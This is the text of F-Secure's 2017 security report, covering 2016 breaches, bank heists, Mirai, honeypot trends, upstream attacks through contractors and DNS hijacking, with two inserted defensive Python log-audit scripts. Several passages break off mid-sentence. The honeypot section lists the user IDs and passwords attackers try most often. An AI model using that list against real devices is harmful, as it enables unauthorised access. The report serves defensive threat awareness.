F-SECURE: STATE OF CYBER SECURITY 2017

FOREWORD: PUNCHED IN THE MOUTH

A BIG PART of cyber security is being prepared. You want to do as much as you can to prevent attackers from breaching your network. Defenders have all kinds of ways to make this work. They have firewalls. They have endpoint protection. They have password managers. They have security training and information resources. And they have all of these right at their fingertips.

What defenders need more of, however, are solutions for when plans fail. Plans fail because what defenders keep ignoring is that there are people behind every cyber threat. Those people are 100% focused on getting around prevention mechanisms to hit their targets. And one of them will always find a way through.

Take passwords for example. Storing them in a password manager seems like the perfect way to address the problem of having too many long, unique passwords to remember. When you need a password, you simply click an empty field to fill in your credentials, or copy and paste them from your password manager to your browser. And it works great. Until you get distracted, accidentally copy your password into a Tweet, and hit Send. Well, guess what? Attackers use Twitter. If they follow you or stumble across your Tweet, they can use it to hit you. And if that password happens to get them into your Facebook or Gmail account, it's game over.

This is one way attackers throw the technologies we all depend on back in our faces. The Internet is an information tracking, storing, and sharing machine. Its capability goes beyond anything else we've seen in history. For the most part, it's brought more good than bad. But its security implications have yet to sink in.

People say they understand the Internet, and maybe in a technical sense they do. But most users are in the dark when it comes to grasping the significance of technologies that log and track everything. Very few people fully comprehend the fact that their data isn't going to disappear. So defenders need to protect it. And that protection cannot depend completely on the idea that security plans, no matter how good they are, are foolproof.

Individuals, companies, and even governments were compromised in 2016. We all saw them bleeding in the news. Now is the time for defenders to stop asking "What happens if we're hit?" They need to start asking "What happens WHEN we're hit? What happens WHEN our plans fail?"

How do you pick up the pieces? How do you move on? How do you take your data, your accounts, and your livelihood back from attackers and get it under your control again?

Regulations rarely hold answers. But the General Data Protection Regulation coming into effect in 2018 will help many European companies start asking the right questions. And while we're generally very skeptical of how much can be accomplished with regulations and directives, it might be worth introducing security standards for Internet of Things (IoT) devices.

Many IoT device vendors have little to no experience in building internet-connected devices. They build IoT devices to be cheap and to work, but not to be secure. We don't believe this will change without either consumers demanding it, or governments enforcing it. The IoT has the same transformative potential as the World Wide Web, and this potential is both good and bad. We're still playing catch-up when it comes to the Internet. We'd be smart to get ahead of the curve for the IoT.

Nobody can fix every flaw, vulnerability, or weakness. But we can learn to roll with the punches and make them a little less painful when they hit.

MIKKO HYPPÖNEN, Chief Research Officer, @mikko
TOMI TUOMINEN, Practice Leader, @tomituominen
CONTENTS

FOREWORD: PUNCHED IN THE MOUTH 2
INTRO: REVERSE-ENGINEERING THE NUMBERS 5
The Internet is vast and complicated. This report covers the trends revealed in analyses of telemetry data gathered from F-Secure products and third-party resources.
LOOKING BACK 6
2016 notable events 7
2016 in review 8
2016 in a nutshell 11
SIZING UP ATTACK SURFACES
Cyber Security Services customer segments 13
So many vulnerabilities, so little time 14
Who's after who? 16
The weakest link 20
CYBER CRIME STORIES 24
Smart business with DNS hijacking 25
The Romanian Underground 27
Cyber-sleuthing: Connecting the dots 29
Crime with a customer mindset
Cyber crime marketing 101 33
Is Mirai the future of the IoT?
Beyond the insecure home security system
FICORA: Responding to a Mirai outbreak in Finland
THE CONSEQUENCES OF CYBER CRIME
The Bitcoin dilemma 42
Bitcoin friction is ransomware's only constraint 45
Today's APTs are tomorrow's opportunists
Nan Hai Shu
The nation state
NOTABLE MALWARE
Exploit kit trends 55
The ransomware tube map
AV-TEST 2016
Security facts at a glance
Macro malware at a glance
Mobile OS takeup 60
LOOKING FORWARD 62
Why there's no S in IoT 63
What we are doing right
Beyond the horizon 65
Virus Bulletin
APPENDICES
Honeypot Intel 68
NCSC-FI's Mirai Mitigation 71
Mirai source code analysis 73
INTRO: REVERSE-ENGINEERING THE NUMBERS

WHAT'S the biggest online shopping day of the year?

If you live in Western Europe or the United States, you'd probably say Cyber Monday, the first weekday following Black Friday, which has become the unofficial launch of the holiday shopping season.

If you live in China, you likely know the answer is actually 11 November, Singles' Day. Alibaba, the massive Chinese online retailer, adopted the day on which young Chinese people celebrate their independence as a marketing hook and sparked a sales bonanza. In 2016, Alibaba's 11.11 Global Shopping Festival generated $20 billion in sales, dwarfing the $3 billion retailers take in on Cyber Monday. Though the site has been aiming to take Singles' Day global since 2014, there's a decent chance you've never heard of it.

We offer this example as a frame of reference. The Internet is so massive that trying to measure it is a bit like the parable of the blind men and the elephant. You could grab one part and think the whole thing is made of tusk.

Fortunately, from our millions of users and partnerships with more than 200 Internet Service Providers who connect tens of millions of users around the globe, we have the ability to get a sense of the whole body. While our partners have exclusive province over all their customer data, our telemetry extracts significant amounts of anonymous yet relevant data. You can Google "F-Secure world map" to see a sample visualization of the data we collect from the majority of countries around the world. We supplement our collection with data mining from several third-party resources, including spam traps and services like VirusTotal, to extrapolate numbers that are representative of the most relevant trends.

This report offers raw numbers when possible and percentages when necessary, given the limitations on the information we collect due to terms and conditions on various products.

No one source can offer a comprehensive picture of how every threat operates all over the world. That's not how threats work. That's not how the Internet works in a world where many online giants have no presence at all in some parts of the world and many threats are polymorphic, offering geographically specific payloads.

In this report, we refer in general to "the Internet", which is the Internet from our point of view. If you're reading this report, it's probably your point of view, too.

We hope you enjoy it. If you're looking for more background about the data in the report, feel free to contact us.
LOOKING BACK

2016 NOTABLE EVENTS 7
2016 IN REVIEW 8
2016 IN A NUTSHELL 11

Cyber security has, in the past, been academic. For most people, anything that involves cyber security (basically, anything related to protecting data or devices) was just a box to tick at work. The layman's perception of it was: whatever, it doesn't really matter in the real world.

That changed in 2016. This was the year when cyber security stopped being ephemeral and started being all too real.

2016 NOTABLE EVENTS

Law & order
APR  EU: GDPR data security law passed
JUN  Russia: Big Brother bill passed
JUL  Privacy Shield replaces Safe Harbor
JUL  EU: NIS Directive adopted
NOV  China: Cyber security law passed
NOV  UK: Snoopers' Charter bill passed
DEC  US: Rule 41 mass hacking change

FEB  Apple fights FBI order to unlock terrorist phone
APR  FBI bought iPhone exploit from hackers
MAY  EU expands Europol powers to track criminals
JUL  Microsoft fights US overseas data warrant
SEP  Germany blocks Facebook collecting WhatsApp user data
NOV  Thai govt to increase online monitoring
DEC  Web giants to identify, remove terror content

Attack the banks
FEB  Bangladesh Bank loses $80M in cyber heist
MAY  More banks raided via SWIFT network
JUL  ATMs in Taiwan hacked to spew money
AUG  SWIFT: More banks report hack attempts
OCT  Odinaff hacker gang targets banks via SWIFT network
NOV  DDoS attacks on Russian banks
NOV  Cobalt hacker gang targets banks' ATMs
NOV  Tesco Bank hack affects 20K accounts
2016 IN REVIEW

CYBER SECURITY has, in the past, been academic. For most people, anything that involves cyber security (basically, anything related to protecting data or devices) was just a box to tick at work. The layman's perception of it was: whatever, it doesn't really matter in the real world.

That changed in 2016. This was the year when cyber security stopped being ephemeral and started being all too real. This was the year when many of the events reported by mainstream media were essentially about data, at every level from intensely personal to international. This was the year when failing to protect data impacted everything from personal finances to mega-corporation deals to elections.

Ransomware everywhere

On a personal level, ransomware was the most visible and direct threat to users in 2016. By seeking out and hijacking control of a user's files, then demanding payment for their return, ransomware drove home the point that in today's world, data means money. Ransomware also directly impacted organizations that provided vital real-world services: small local businesses, hospitals, universities, local government services, mass transportation networks, etc. Some of the affected targets chose to pay the ransom demanded rather than lose the data taken hostage. Others chose not to, but were forced to scramble or fall back to slower processes (some of the hospitals reportedly went back to pen and paper) while their systems were disinfected.

Mega-breaches

For businesses, failing to protect data can also lead to uncomfortable questions, for themselves and their clients. In April, over 11 million documents from the Panama-based offshore law firm Mossack Fonseca were anonymously shared with an international coalition of investigative journalists. The papers detailed the financial dealings of some of the world's top politicians and celebrities, including prominent figures in Russia, the United Kingdom, Egypt, Iceland, and China.

This quickly became known as the Panama Papers leak, and led to public protests, one elected official stepping down from public office (Iceland's Prime Minister Sigmundur Davíð Gunnlaugsson), and investigations of individuals in multiple countries by the relevant tax authorities based on the records revealed.

While the Panama Papers leak would in any other year be considered massive, Yahoo announced in September that a data breach which had taken place in 2014 had compromised over 500 million webmail accounts. In December, Yahoo again announced a data breach, a separate incident that apparently occurred in 2013 and affected 1 billion users. This effectively gave the web giant the unenviable distinction of suffering the largest data breach in history.

Yahoo attributed the first breach to a state-sponsored attacker, though questions remain about the attribution. Questions also hang over the full extent of both breaches, the timing of the announcements, and the potential impact of the incidents on the deal between Yahoo and Verizon, which had agreed to acquire the web firm's core properties for $4.83 billion in July, but had not yet closed the deal.

Election shenanigans

2016 is also the year when failing to protect data may actually have swung an election. It is probably impossible to realistically measure the impact of the email server controversy that afflicted the Democratic candidate's campaign during the United States presidential elections, but there's no dispute that it did influence some voters. It is certainly the first time that the future of an entire nation, and really of most of the world, was affected by an unfortunate IT administrative decision.

The 2016 US presidential elections were remarkable in many ways, not least for allegations of direct hacking by Russia. In July, emails from the Democratic National Convention (DNC) were published on WikiLeaks. In October, the US intelligence community publicly announced that it believed Russia had been behind the DNC hack, and had pursued other operations to introduce uncertainty and influence the elections in favor of the Republican candidate; the underwhelming Grizzly Steppe report jointly released in December by the Department of Homeland Security and the Federal Bureau of Investigation (FBI) sought to document proof of these allegations. In a retaliatory response, President Obama expelled 35 Russian diplomats from the US and imposed sanctions on a number of other Russian individuals and organizations. Russia, which denied the allegations, unexpectedly refrained from the usual tit-for-tat diplomatic action and instead said it would wait for incoming president-elect Trump's administration to see what would happen.

Attack the banks

Much like political establishments, the global financial system has always been a popular target for attack, and 2016 saw a new form of attack emerge. In May, the central bank of Bangladesh was forced to announce that it had suffered a loss of $81 million. Hackers had managed to steal the bank's credentials and issue fraudulent instructions over the SWIFT global bank messaging network to transfer funds from the bank's account with the New York Federal Reserve to accounts in Sri Lanka and the Philippines.

It later emerged that the Bangladesh bank heist was only one of a series of attacks, with reports of banks in Vietnam, Ecuador, and the Philippines being targeted. The attacks essentially used weaknesses in an individual bank's cyber security to commit financial fraud affecting other banks within the same network.

While the average customer wasn't directly affected by the attacks, they raised fears about trust in the global banking system and bank solvency. Some security researchers also highlighted similarities between the bank attacks and the hack of Sony Entertainment Pictures in 2014. The hack was attributed to North Korea, which has been under heavy international sanctions for years. If the bank attacks can also be conclusively attributed to North Korea, it would be the first known instance of a state using cyber attacks to gain funds.

Rise of the IoT botnets

While targeted infiltrations and thefts such as the bank hacks usually affect only a handful of people, 2016 also saw the rise of Internet of Things (IoT) botnets and their use in launching Distributed Denial of Service (DDoS) attacks that can directly affect thousands, or even millions of users.

DDoS attacks have always been an occasional nuisance, but the explosion of internet-connected devices with poor or no device security means that any individual with basic computing knowledge and a grudge can now use easily available tools to create a botnet with a colossal amount of computing power.

The first notable instance of this was the October attack on security researcher Brian Krebs' KrebsOnSecurity website, which was hit with traffic that peaked at 620 Gbps, nearly double the next largest such attack. This was swiftly followed by an attack on the Dyn DNS service, which led to disruptions in web traffic to multiple major websites, including Twitter, Amazon, Tumblr, Reddit, Spotify, and Netflix.

These attacks were attributed to a botnet coined Mirai. In November, the source code for the botnet was released online, and other hackers quickly began creating their own versions of the botnet using the released code. Soon after, banks in Russia announced that their web portals had been briefly disrupted by DDoS attacks launched by these new botnets, while customers of the Deutsche Telekom, Post Office, and TalkTalk ISPs in the UK and Germany found that their routers had been infected by Mirai variants.

State versus private data versus tech firms

In 2016, user data and its transmission over the Internet also came under increasing state scrutiny. Many countries are either considering or have passed legislation that would effectively grant the state greater access to users' communications. This includes the Investigatory Powers Act 2016 in the United Kingdom (aka the Snoopers' Charter); the amendment to the Rule 41 Search and Seizure law in the United States; the Yarovaya package anti-terrorism bill (aka the Big Brother bill) in Russia; and so on.

While users who don't live in these countries might consider these legal changes completely irrelevant, their data may still be affected. Data today isn't confined by national borders. Global tech companies such as Google or Apple are now effectively international custodians of their users' information, and have increasingly been pushing back against state demands for access to it.

The most visible example of the tension between the companies holding user data and state authorities was the legal battle in the first half of 2016 between the FBI and Apple over demands that the tech firm help them break the encryption on an iPhone belonging to one of the 2015 San Bernardino terrorists. The courtroom battle came to an unexpected end when the FBI was able to access the device without assistance from Apple, after they reportedly purchased an exploit from a third party. While the court case has ended, questions remain about the boundaries for state access to user data.

As such, perhaps the most direct and immediate improvement in cyber security to take place in 2016 was the unexpected move by WhatsApp Messenger to introduce default end-to-end encryption for its popular messaging app. This form of encryption means that the company itself cannot see or provide the content of messages sent over its network. This simple and effective change provided better data security and privacy for over 1 billion users around the world, including many in countries where privacy or human rights are less highly regarded.
2016 IN A NUTSHELL

[Illustration, three panels: RANSOMWARE GOES MAINSTREAM; ENCRYPTION DEBATE; BANKS ATTACKED FROM WITHIN]
SIZING UP ATTACK SURFACES

When non-technical people picture a cyber attack, they most likely conjure up an image of a hacker in a hoodie sitting in a basement, or a bespectacled military nerd in a command center halfway across the globe. While this sort of scenario could be true (at least the halfway around the globe part), some of the more sophisticated cyber attacks and crimes that were carried out during 2016 involved the use of physical intrusions. Physical intrusions tend not to be publicized all that often, and hence most people aren't aware of them, except for things like device theft or ATM skimmers.

A physical intrusion is a very effective way to carry out a targeted attack against a company or individual. Since people are usually not on the lookout for the telltale signs of physical breaches, they're alarmingly easy to carry out and tend to go undiscovered for a long time.

Our own Cyber Security Services teams carry out physical attacks as part of the threat assessment projects we run with customers. Their anecdotes are both fascinating and eye-opening. They're often funny too. While the authors were drafting this report, a CSS consultant shared an anecdote about how they'd infiltrated a network closet at a customer site and installed some malicious devices, only to return a few weeks later and find that someone had neatly tidied them up on the shelf. It's amazing how much they're able to get away with, in plain sight.

CYBER SECURITY SERVICES CUSTOMER SEGMENTS 13

Financial & Insurance    44%
Service providers        18%
Other                    12%
Online gaming            10%
World leading brands      8%
Governmental              6%
Aviation                  1%
Shipping                 <1%

SO MANY VULNERABILITIES, SO LITTLE TIME 14

WHO'S AFTER WHO? 16
F-Secure researchers employ a global network of honeypots to help monitor the online threat landscape. While there are limitations to what honeypots can tell us, they are an excellent source of information regarding high-level patterns and trends, such as how attackers, self-replicating botnets, and other sources find targets.

THE WEAKEST LINK 20
SO MANY VULNERABILITIES, SO LITTLE TIME

THERE'S WAY TOO MUCH hype about zero day vulnerabilities. The website CVE Details shows an average vulnerability score of 6.8, across all known vulnerabilities, on all known platforms. Of the over 80,000 known vulnerabilities in their database, 12,000 (almost 15%) of them are classified as high-severity. Remember, though, that these vulnerabilities exist over plenty of different client and server-side applications (including, you guessed it, Adobe Flash).

From a company's point of view, handling high-severity vulnerabilities is a number one priority. And they get handled in well run organizations. High-severity vulnerabilities get a lot of visibility, and because of this, they're patched on the spot.

But vulnerabilities alone don't make up your company's entire attack surface. Your CISO is probably more worried about phishing and upstream attacks than internal network misconfigurations and unpatched internal systems.

As an IT admin, taking care of infrastructure is your biggest concern. Of course, you're going to perform triage when a new high-severity vulnerability surfaces. But what about the rest of them? Applying every patch to every piece of software on every system on your network, as the patch is released, is just not feasible. That's why admins rely on periodic patch cycles to fix low severity vulnerabilities, if they do at all.

Taking time out of their day to understand the implications of every newfound vulnerability out there is too much to ask for most IT admins. And so, in many cases
WHO'S AFTER WHO?

[Charts: top source countries for attacks on the honeypot network; top target countries for attacks on the honeypot network]

Active reconnaissance involves hackers using techniques like port scanning to probe devices and networks. This probing allows them to collect specific

With Russia being the largest

US was the most frequent target of both global and Russian traffic. Traffic originating from Chinese IPs provided a few notable exceptions to this trend: the US and Germany were both the most frequent source and destination for reconnaissance traffic to and from China.

It is very common for attacks to be conducted through proxies. There are many different ways attackers all over the world can leverage proxies to help them conduct attacks. For example, attackers can compromise a machine (such as by infecting a computer with malware) and then use it to conduct scans looking for additional targets. Worms, bots, and other types of malware programmed to automatically begin scanning for new targets after infecting a particular device are often spread in this fashion.

The more prominently countries appear in these observations, the more likely it is that there are compromised networks or infrastructure (such as bulletproof hosting services) used by attackers located in the same country or somewhere else in the world. The use of proxies to transcend national borders makes law enforcement and other efforts to combat abuse more difficult, essentially hardening criminal enterprises against takedown attempts.

Automating active reconnaissance allows attackers to effectively scale their operations and grow their infrastructure. Such expansion can help attackers develop their capabilities by giving them what they need to perform DDoS attacks, conduct spam/phishing campaigns, and more. A portion of the traffic observed by our honeypots is most likely the result of automated scanning and self-replicating botnets.

What are they looking for?

Nearly half of the traffic observed by our honeypots was looking for exposed http/https ports. Attackers probe these ports in an attempt to look for vulnerable software that can be exploited in order to upload malware or otherwise compromise the device. Even though the honeypots were clearly not high-value targets, nor capable of being owned in the way that an actual vulnerable device could, they attract interest from attackers looking to leverage vulnerable machines as proxies for further attacks.

SMTP ports were another popular target. Again, attackers probe these ports looking for exploitable software. These ports are also frequently targeted by spam and phishing campaigns, putting them in the line of fire for a wide variety of scams used by opportunistic cyber criminals.

Ports used for more specific purposes, such as Telnet and SSDP, were also targeted by the traffic we observed. Telnet and SSDP are both easy targets for attackers looking to hijack devices and have both been associated with DDoS-related botnets, so it's no surprise that leaving them open was enough to attract attention.

Most used user IDs in attacks on honeypots (scale 0 to 1.2 M): root, admin, user, test, ubnt, pi, guest, 123321, support, oracle, mysql, nagios, ftp, postgres, 12345, tomcat, ubuntu, 111111

Most used passwords in attacks on honeypots (scale 0 to 300 k): root, support, 111111, admin, 12345, password, 123456, 1234, 123, 1, raspberry, user, pass, any, welc0me, default, synopass, test, alpine
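As an added example (not code from the report or from F-Secure's honeypot network), the following Python turns honeypot connection records into the breakdowns this section describes: the share of probes per target service, how many distinct source countries hit each service, and the most used login IDs and passwords. The record format, the port-to-service mapping and the sample lines in SAMPLE_LOG are all constructed for the example.

```python
"""Aggregate honeypot connection records into the breakdowns described in
"Who's after who?": share of probes per target service, distinct source
countries per service, and the most used login IDs and passwords.

Added example for this page. The record format, the port-to-service mapping
and SAMPLE_LOG are constructed for the example and do not describe
F-Secure's honeypot network."""
import re
from collections import Counter, defaultdict

# Constructed sample records (not real telemetry): one probe per line, with
# "user=- pass=-" meaning the probe carried no login attempt. The last two
# lines are deliberately malformed to exercise the parser's error handling.
SAMPLE_LOG = """\
2016-11-02T03:14:07Z src=RU dport=80 user=- pass=-
2016-11-02T03:14:09Z src=RU dport=443 user=- pass=-
2016-11-02T03:15:11Z src=CN dport=23 user=root pass=root
2016-11-02T03:15:12Z src=CN dport=23 user=admin pass=admin
2016-11-02T03:16:40Z src=US dport=8080 user=- pass=-
2016-11-02T03:17:02Z src=DE dport=25 user=- pass=-
2016-11-02T03:18:55Z src=BR dport=2323 user=root pass=12345
2016-11-02T03:19:30Z src=US dport=1900 user=- pass=-
2016-11-02T03:20:01Z src=VN dport=22 user=pi pass=raspberry
2016-11-02T03:20:03Z src=VN dport=22 user=root pass=password
2016-11-02T03:21:17Z src=CN dport=80 user=- pass=-
2016-11-02T03:22:44Z src=RU dport=80 user=- pass=-
garbage line without any fields
2016-11-02T03:23:00Z src=NL dport=notaport user=- pass=-
"""

# Assumed grouping of destination ports into the service categories the page
# discusses (http/https, SMTP, Telnet, SSDP); anything else counts as "other".
SERVICE_BY_PORT = {
    80: "http/https", 443: "http/https", 8080: "http/https", 8443: "http/https",
    25: "smtp", 465: "smtp", 587: "smtp",
    23: "telnet", 2323: "telnet",
    1900: "ssdp",
    22: "ssh",
}

FIELD_RE = re.compile(r"(\w+)=(\S+)")
REQUIRED = {"src", "dport", "user", "pass"}


def parse_line(line):
    """Parse one record; return None for anything malformed rather than
    letting one bad line abort the whole aggregation."""
    parts = line.strip().split(maxsplit=1)
    if len(parts) != 2:
        return None
    fields = dict(FIELD_RE.findall(parts[1]))
    if not REQUIRED.issubset(fields):
        return None
    try:
        dport = int(fields["dport"])
    except ValueError:
        return None
    if not 0 < dport < 65536:
        return None
    return {
        "ts": parts[0],
        "src": fields["src"],
        "dport": dport,
        "user": None if fields["user"] == "-" else fields["user"],
        "pass": None if fields["pass"] == "-" else fields["pass"],
    }


def summarize(log_text, top_n=5):
    """Build the report-style breakdown from raw log text."""
    records = [r for r in map(parse_line, log_text.splitlines()) if r]
    by_service = Counter()
    sources = defaultdict(set)
    users, passwords = Counter(), Counter()
    for r in records:
        service = SERVICE_BY_PORT.get(r["dport"], "other")
        by_service[service] += 1
        sources[service].add(r["src"])
        if r["user"] is not None:
            users[r["user"]] += 1
        if r["pass"] is not None:
            passwords[r["pass"]] += 1
    total = sum(by_service.values())
    return {
        "records": len(records),
        # Fraction of all probes that targeted each service category.
        "service_share": {s: n / total for s, n in by_service.items()},
        # Distinct source countries per service: a high count on one service
        # points at distributed, automated scanning rather than one actor.
        "sources_per_service": {s: len(c) for s, c in sources.items()},
        "top_users": users.most_common(top_n),
        "top_passwords": passwords.most_common(top_n),
    }


if __name__ == "__main__":
    summary = summarize(SAMPLE_LOG)
    print(f"{summary['records']} records parsed")
    for service, share in sorted(summary["service_share"].items(),
                                 key=lambda kv: -kv[1]):
        print(f"  {service:10s} {share:6.1%}  "
              f"from {summary['sources_per_service'][service]} countries")
    print("  top user IDs:", summary["top_users"])
    print("  top passwords:", summary["top_passwords"])
```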
THE WEAKEST LINK

MOST COMPANIES rely on external contractors, partners, and suppliers to get business done. As these business partnerships evolve, it's not uncommon for systems and processes on both sides to be integrated together. We've observed that in many cases, the security practices of third parties are overlooked when this sort of integration takes place.

There are many reasons for this. Requiring partners to tighten their security practices, if at all possible, slows business down. Teams and individuals tasked with arranging business partnerships often aren't security-minded. And when IT departments start integrating systems, they are often pressured to just get things done, and end up having to cut corners.

Every third party you work with has the potential to increase your attack surface. This can lead to opportunistic attacks (your partner gets breached and the attacker finds a way into your own systems) or targeted attacks (the attacker researches companies you're partnered with and finds a way into your network via one of their systems). Any breach that involves an attacker pivoting into your network via a third party can be defined as an upstream attack.

Exposure points in your attack surface can wildly vary based on the type of third party you're doing business with. There's a lot of room for creativity when it comes to upstream attacks, and it's extremely difficult to cover every possible scenario. Here we present you with a few examples of upstream attack vectors that we saw in the field last year.

Facilities services

Companies that provide on-site facilities services, such as garbage collection, cleaning, physical security, and maintenance, get physical access to their customers' premises as part of their work. This access can include ID badges, keycards, door codes, and maps of the buildings.

We're all familiar with the fact that, more often than not, cyber attacks originate from different geographic locations than the target they're attacking. However, when considering methodically planned, targeted attacks, adversaries looking to infiltrate an organization may be willing to go as far as to gain physical access to their target's premises. In such cases, the attacker may turn to facilities service providers to obtain that access. Indeed, the act of obtaining physical access to an office as part of a targeted attack is something our incident response teams saw happening in Europe during 2016.

Facilities services companies are often quite low-tech. For instance, it's not uncommon for them to keep

[Figure 1: a service provider, used to manage the company, as the route into the company]
relevant documents on an open-access file share that workers access to download and print instructions before they leave on assignment. The insecure methodologies employed by-and-large by facilities service providers are ripe for the picking, should an adversary choose to make a physical breach part of their attack.

Our CSS consultants are ever wary of upstream attacks, targeting a primary target via a third-party, and they know from their own red teaming gigs that tactics such as imitating a carpet cleaning company will gain them access to many physical locations. Information relevant to gaining physical access to offices or homes can also be of value to criminals.

access controls is often very old, and written without security in mind. It's not uncommon for such systems to be accessed over Telnet or VNC, and sometimes with no authentication. You can find plenty of this stuff with Shodan.

In a now classic example of an upstream attack involving a facilities provider, Target was breached in 2013 via a system designed to monitor and control air conditioning hardware. The machine in question was accessible from the Internet and had connectivity with Target's retail operations. Attackers easily owned the air conditioning monitor. From there, they were able to pivot onto Target's network, and then onto Target's point-of-sales systems.

[Figure 2: a service provider is hacked and infected, then used as the route into the company]
Page 21
The Weakest Link
The recruitment process is
fraught with danger from both
spear phishing threats and
crimeware
vulnerable plugins). And finally, any of the customers' networks can be breached, giving an attacker access to the web server and, from there, all of the other interfaced systems. These types of systems have large attack surfaces and are tempting targets for potential adversaries.

Recruitment agencies are also at high risk due to the type of content they deal with on a daily basis. Recruitment agencies deal with job applications, in the form of PDFs and Microsoft Word documents, which constantly arrive from unsolicited sources. These document types are extremely common infection vectors.

Furthermore, recruitment agencies often run their own applicant database systems that are in-sourced by customers. A recruiter receiving a malicious CV might unknowingly upload it to their system, where it is then accessed by dozens of customers (from within their own company networks). All the attacker needs to do is bypass any security or AV product the recruitment agency is using in order to spread the malicious document further.

Malicious documents are not the only attack vector in this scenario. Applicants may also link to watering holes from within their CVs or cover letters. In a real-world example from late 2016, our Threat Intelligence team observed several HR departments being targeted by phishing attacks as part of opportunistically targeted ransomware campaigns against businesses.

It goes without saying that the recruitment process is fraught with danger from both spear phishing threats and crimeware.

Consultants

Many companies source external staff, in the form of contractors and consultants. Companies that provide consulting and outsourcing services invariably maintain their own security policies (regarding endpoint protection, hardening, document handling, and security awareness guidelines), which are guaranteed to differ from the policies defined by their client companies.

Several high-profile cases over the last few years have illustrated the fact that employees of external services can pose a credible insider risk to an organization.

Consultants receive limited or full access to corporate networks and resources, often via workstations or laptops that haven't been issued and configured by the organization they are consulting for. Many companies bring in consultants to set up or maintain financial systems. Software engineers are also commonly outsourced, and these consultants gain access to part, or all, of their customers' source repositories and version control systems. It's almost impossible to carefully monitor a consultant's every move.

When looking for an ingress point during a targeted attack, threat actors sometimes turn to the owners of botnets to rent specific compromised machines that
are known to be part of the targeted organization. External contractors widen the net when it comes to finding these already compromised systems. They also widen the net for spear phishing and social engineering attacks.

If your organization routinely uses contractors and external personnel, your physical premises could be more open to social engineering tactics. With so many different faces coming and going on a daily basis, it's easier to fool employees, and an attacker posing as a consultant might readily be given access to the building, and possibly even secure areas within it. Our CSS consultants use such tactics to great effect when performing threat assessments for customers.

Final advice

When working with third parties, there are a few things you can do to minimize the risk of upstream attacks. Always be cautious when allowing any external device to access your network. Limit access as much as possible. Use tight access controls. If possible, make sure external devices are connected to segregated, controlled networks. Assume the device in question is compromised, and treat it as such.

When bringing in a partner, assess their security practices and, if possible, work with them on improving areas where they're lacking. At the very least, ask partners to follow a defined set of basic policies and practices. Where possible, audit their systems yourself.

When it comes to on-site staff, provide them with equipment that you've set up and configured yourself. Allow them to access only the systems they need to work with, and remove access as soon as they're finished with the assignment. Make sure you're able to log their access and the changes they make, and remember to audit those logs.

Be especially aware of legacy systems such as those used to control machinery or infrastructure. If possible, keep these systems isolated and don't give them access to your corporate network. If you're giving third parties access to these sorts of systems, make sure there are proper authentication and audit mechanisms in place, and that they aren't open to the Internet.

Keep an eye on what is connecting to your corporate network and what it's trying to access. This is especially important if you have a lot of external parties coming and going. Run frequent discovery scans on your network, identify unknown systems and services, and shut them down if you find them.

And finally, it's always good to teach your employees to be aware of social engineering practices in the workplace. Teach them with stories and anecdotes. Have them watch the 1992 film Sneakers, or the recently aired TV show Mr. Robot. Learning about this stuff is fun, and it will engage your staff.
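As an added example that is not part of the report, the script below shows what auditing the contractor access logs recommended above can look like in practice: it walks constructed access-log lines against a constructed assignment register and flags access to systems outside a contractor's approved set, access after the assignment end date (access that was never removed), and activity by accounts with no assignment at all. All account names, hostnames and timestamps are made up.

```python
"""Audit third-party access logs against a contractor assignment register.

Added example, not code from the F-Secure report. It checks the report's advice
that on-site staff get access only to the systems they need, lose it when the
assignment ends, and have their access logged and audited. All hosts, accounts
and log lines are constructed sample data.
"""
from datetime import date, datetime

# Constructed assignment register: approved systems and assignment end date.
ASSIGNMENTS = {
    "ext-anna": {"systems": {"erp-db01", "erp-app01"}, "ends": date(2016, 11, 30)},
    "ext-ben": {"systems": {"git01"}, "ends": date(2016, 12, 15)},
}

# Constructed access log, one event per line: "timestamp account host action".
SAMPLE_LOG = """\
2016-11-28T09:12:01 ext-anna erp-db01 login
2016-11-28T09:40:17 ext-anna erp-app01 config-change
2016-11-29T14:02:55 ext-anna hr-fileshare login
2016-12-01T08:30:00 ext-anna erp-db01 login
2016-12-02T10:15:42 ext-ben git01 login
2016-12-02T11:00:09 ext-carl git01 login
"""


def parse_log(text):
    """Yield (timestamp, account, host, action) tuples from the log text."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, account, host, action = line.split()
        yield datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S"), account, host, action


def audit(log_text, assignments):
    """Return findings as (kind, account, host, timestamp) tuples, in log order.

    kind is one of:
      unknown-account  - activity by an account with no recorded assignment
      out-of-scope     - access to a system the contractor was not approved for
      after-assignment - access after the assignment end date (access not removed)
    """
    findings = []
    for ts, account, host, action in parse_log(log_text):
        rec = assignments.get(account)
        if rec is None:
            findings.append(("unknown-account", account, host, ts))
            continue
        if ts.date() > rec["ends"]:
            findings.append(("after-assignment", account, host, ts))
        if host not in rec["systems"]:
            findings.append(("out-of-scope", account, host, ts))
    return findings


def summarize(findings):
    """Count findings per kind; any non-empty result means access control needs attention."""
    counts = {}
    for kind, *_ in findings:
        counts[kind] = counts.get(kind, 0) + 1
    return counts


if __name__ == "__main__":
    results = audit(SAMPLE_LOG, ASSIGNMENTS)
    for kind, account, host, ts in results:
        print(f"{ts.isoformat()} {kind:17} {account} -> {host}")
    print(summarize(results))
```

The same logic applies to a real log as long as each line can be mapped to an account, a target system and a time; the change-tracking the report asks for is covered by logging actions such as config-change alongside logins.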
CYBER CRIME STORIES
DNS Hijacking

DNS HIJACKING represents an appealing form of attack for criminals. The victims of these attacks are largely unaware that their systems have been compromised, and the attacks themselves are rather troublesome for security providers to accurately identify.

[Figure: Why all the porn ads?]

DNS (Domain Name System) hijack attacks fall into two rough categories: either your computer's DNS settings are changed (by a piece of malicious software or a PUA, Potentially Unwanted Application), or your home router's settings are modified by an attacker (which means that, in most cases, all devices connecting to the router receive bogus settings pointing to malicious DNS servers). Routers can be hacked either by an attacker guessing the login credentials for the device's admin interface (this is common, since many people don't change their default router settings) or via a vulnerability in the router's software.

Once the DNS settings have been changed, the attacker can perform a variety of malicious actions. For example, the victim of a DNS hijack can be directed toward a trojanized version of their online banking service, allowing the criminal to steal credentials or hijack the banking session. Victims can also be directed toward trojanized social media sites designed to steal login credentials, which can be later used for collecting personal information or for identity theft. Finally, rogue DNS servers can change the adverts that appear on legitimate websites that the victim visits. These ads can range from being a little more aggressive (pop-up ads, pop-under ads, and such), show content the user wasn't expecting (ads for porn sites, viagra, etc.), or even trick the user into doing something they shouldn't (pop-ups that claim your machine is infected, that direct you to a site that can fix the issue).

What we're seeing in the field

